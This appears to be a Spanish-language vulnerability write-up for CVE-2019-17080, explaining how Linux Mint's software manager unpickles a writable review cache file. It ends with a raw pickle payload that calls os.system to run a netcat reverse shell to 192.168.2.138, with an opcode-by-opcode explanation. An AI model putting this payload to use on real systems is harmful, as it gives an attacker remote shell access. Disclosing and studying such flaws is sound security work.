
CVE-2019-17080
[TR] El administrador de software de Linux Mint (v 7.9.5/9) provoca la ejecución de inyección de objetos y código arbitrario debido a una configuración incorrecta.
[EN] El administrador de software de Linux Mint (v 7.9.5/9) nos hace ejecutar inyección de objetos y código arbitrario debido a una configuración incorrecta.
mintinsall
[TR] Cuando ejecutamos el administrador de software de Mint, verifica si hay un nuevo comentario. Si hay un nuevo comentario, lo descarga de new-reviews.list y lo escribe en el archivo.
[EN] Si hay un nuevo comentario, lo descarga de new-reviews.list y lo escribe en el archivo.

code mintinstall.py
[TR] Cuando el administrador de software se inicia por primera vez, llama a la clase ReviewCache() del módulo de revisiones.
[EN] Cuando el administrador de software se inicia por primera vez, llama a la clase ReviewCache() del módulo de revisiones.

code reviews.py
[TR] Cuando la clase ReviewCache se inicia (init), llama a la función _load_cache().
[EN] Cuando la clase ReviewCache se inicia (init), llama a _load_cache()

[TR] La función Load cache lee el archivo en la variable REVIEWS_CACHE y deserializa los datos en el archivo con la ayuda del módulo pickle y almacena algunos valores en la memoria.
[EN] La función Load cache lee el archivo en la variable REVIEWS_CACHE y deserializa los datos en el archivo con la ayuda del módulo pickle y mantiene algunos valores en la memoria.

[TR] Cuando verifico el archivo, parece que tengo permiso de escritura.
[EN] Cuando verifico el archivo, parece que tengo permiso de escritura.

[TR] Ya que podemos realizar operaciones de serialización/deserialización con la ayuda del módulo Pickle, podemos incluir el módulo usando el método reduce y ejecutar código arbitrario.
[EN] Ya que podemos realizar operaciones de serialización/deserialización con el módulo Pickle, podemos incluir el módulo y ejecutar código arbitrario usando el método reduce.

[TR] En este caso, si se intenta deserializar el archivo, nuestro código malicioso se ejecutará.
[EN] Si intenta deserializar el archivo, nuestro código malicioso funcionará.
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>> nombre del módulo c{os}
>> función
( >> objeto marcador
S >> lee hasta el final de la comilla y lo coloca en la pila
tR. >> llama a los elementos en la pila y coloca el resultado en la pila.

